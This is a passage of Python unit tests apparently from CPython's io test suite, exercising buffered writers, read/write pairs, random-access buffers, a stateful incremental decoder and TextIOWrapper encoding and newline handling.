bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b"abcdef")
# Silence destructor error
bufio.close = lambda: None
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
def test_slow_close_from_thread(self):
# Issue #31976
rawio = self.SlowFlushRawIO()
bufio = self.tp(rawio, 8)
t = threading.Thread(target=bufio.close)
t.start()
rawio.in_flush.wait()
self.assertRaises(ValueError, bufio.write, b'spam')
self.assertTrue(bufio.closed)
t.join()
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
@skip_if_sanitizer(memory=True, address=True, reason= "sanitizer defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends into gc.garbage instead
self.addCleanup(support.unlink, support.TESTFN)
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
self.assertEqual(pair.read1(), b"def")
def test_readinto(self):
for method in ("readinto", "readinto1"):
with self.subTest(method):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = byteslike(b'\0' * 5)
self.assertEqual(getattr(pair, method)(data), 5)
self.assertEqual(bytes(data), b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
buffer = bytearray(b"def")
pair.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
# Silence destructor error
reader.close = lambda: None
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
# Silence destructor error
writer.close = lambda: None
writer = None
# Ignore BufferedWriter (of the BufferedRWPair) unraisable exception
with support.catch_unraisable_exception():
# Ignore BufferedRWPair unraisable exception
with support.catch_unraisable_exception():
pair = None
support.gc_collect()
support.gc_collect()
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('writer_non_existing', str(err.exception.__context__))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
# Silence destructor error
reader.close = lambda: None
writer.close = lambda: None
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if it needs so
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
# You can't construct a BufferedRandom over a non-seekable stream.
test_unseekable = None
# writable() returns True, so there's no point to test it over
# a writable stream.
test_truncate_on_read_only = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
@skip_if_sanitizer(memory=True, address=True, reason= "sanitizer defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin-1", newline="\r\n")
self.assertEqual(t.encoding, "latin-1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf-8", line_buffering=True)
self.assertEqual(t.encoding, "utf-8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
t.read, 0)
t.__init__(self.MockRawIO())
self.assertEqual(t.read(0), '')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with self.assertRaisesRegex(LookupError, "is not a text encoding"):
self.TextIOWrapper(b, encoding="hex")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
self.assertFalse(t.write_through)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = "r"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_recursive_repr(self):
# Issue #25455
raw = self.BytesIO()
t = self.TextIOWrapper(raw)
with support.swap_attr(raw, 'name', t):
try:
repr(t) # Should not crash
except RuntimeError:
pass
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_reconfigure_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=False)
t.write("AB\nC")
self.assertEqual(r.getvalue(), b"")
t.reconfigure(line_buffering=True) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nC")
t.write("DEF\nG")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.write("H")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.reconfigure(line_buffering=False) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
t.write("IJ")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
# Keeping default value
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, False)
t.reconfigure(line_buffering=True)
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, True)
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_default_encoding(self):
old_environ = dict(os.environ)
try:
# try to get a user preferred encoding different than the current
# locale encoding to check that TextIOWrapper() uses the current
# locale encoding and not the user preferred encoding
for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
if key in os.environ:
del os.environ[key]
current_locale_encoding = locale.getpreferredencoding(False)
b = self.BytesIO()
t = self.TextIOWrapper(b)
self.assertEqual(t.encoding, current_locale_encoding)
finally:
os.environ.clear()
os.environ.update(old_environ)
@support.cpython_only
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_device_encoding(self):
# Issue 15989
import _testcapi
b = self.BytesIO()
b.fileno = lambda: _testcapi.INT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
b.fileno = lambda: _testcapi.UINT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertEqual(t.encoding, "utf-8")
t = self.TextIOWrapper(b)
self.assertIsNotNone(t.encoding)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(keepends=True)),
("", testdata.decode("ascii").splitlines(keepends=True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
